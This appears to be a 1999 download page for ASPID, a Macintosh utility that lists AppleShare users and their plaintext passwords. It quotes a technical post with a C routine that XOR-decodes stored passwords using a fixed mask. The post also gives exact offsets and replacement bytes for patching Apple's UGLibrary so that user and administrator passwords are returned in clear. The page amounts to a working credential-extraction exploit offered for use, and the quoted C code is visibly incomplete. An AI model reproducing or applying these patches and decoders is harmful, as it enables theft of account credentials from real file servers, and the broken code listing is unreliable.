Last modification date: Oct 7, 1999


ASPID (AppleShare Password Instant Dumper) is an application for the Macintosh which generates a listing with users and passwords from the personal AppleShare server included with MacOS 7.x and 8.x as well as AppleShare 3.x and 4.x (and maybe others!)

  • ASPID for the PowerPC and 68k Macintosh as 68k binary. (78 Kb, sources included)

    Technical documentation:

    From spd Tue Sep 14 22:10:54 1999
    Subject: MacOS system encryption algorithm 3
    Date: Tue, 14 Sep 1999 22:10:54 +0200 (DST)
        Sometime ago, Dawid adix Adamski <adixx at FRIKO4.ONET.PL> sent to
        bugtraq the encryption algorithm in MacOS personal AppleShare
        server he found.
        I have been researching a little on this subject, and I've found
        his code fails when decoding the first character of the password,
        for this char you need additional data from the "Users & Groups
        Data File", specifically, the 4th byte after the encoded sequence
        described in his message.
        So, after cleaning a little the code, you get something as simple as
    #include <stdio.h>
    int main(){
        register int i=0;
        unsigned char *mask="rpcgtprk";
        unsigned char *pw="\x28\x08\x2F\x3B\x20\x36\x30\x5B\x00\x00\x00\x09";
        unsigned char c;
        for(i=0; i<7; i++)
            c = pw[6-i] ^ mask[7-i];
            pw[7-i] ^= c;
        c = pw[11] ^ mask[7-i];
        pw[7-i] ^= c;
        But you still have to find the encrypted passwords in the binary
        data file.
        Apple's AppleShare SDK provides a "UGLibrary" to deal with this
        data file; but it doesn't let you access the user password (which
        is decrypted in the stack when you call "UGAuthenticateUser()",
        nor the encrypted one.
        In fact, in this call, the encrypted password is decrypted to the
        stack, and compared against the user supplied one.
        So, all we have to do is replace the compare with a copy:
    * 00000206: B036 70F4      '.6p.'   CMP.B      -$0C(A6,D7.W),D0
    * 0000020A: 6710           'g.'     BEQ.S      *+$0012             ; 0000021C
        is replaced with
    * # ADDQ.W      #$02,A2             544A
    * # MOVE.B      D0,-(A2)            1500
    * # BRA.S       *+$0012             6010
    * i.e., go to offset 28A0 and replace "B036 70F4 6710" with "544A 1500 6010"
    * in "UGLibrary.o"
        After that, we can build a simple program (about 150 lines) and
        with just a double click, we get a listing with all the users
        and decoded passwords in the system.
        That's enough for the personal AppleShare server included with
        MacOS 7.x and 8.x; for AppleShare server 3.x (and, probably 4.x;
        I didn't check it) the data file is protected by a "administrator
        password" so you need it before being able to use the modified
        But that password uses the same encryption algorithm/check as
        the users ones, so we only have to change "UGOpenFile()" in the
        same way:
        at offset 0A92, B030 7000 671A becomes 544A 1500 601A
        So, with these modifications, AppleShare 3.x admin password
        is returned into filePB.ugAdminKey after UGOpenFile() and
        users password are returned into userPB.ugPassword after
        UGAuthenticateUser(), both in plain text format.
        A program which uses this method for listing users and passwords
        can be found (both MacOS 68k binary and source code) at
        (Stuffit 5.x archive)

    See also:

    All of these use Adixx code; ASPID uses Apple UG Lib code instead.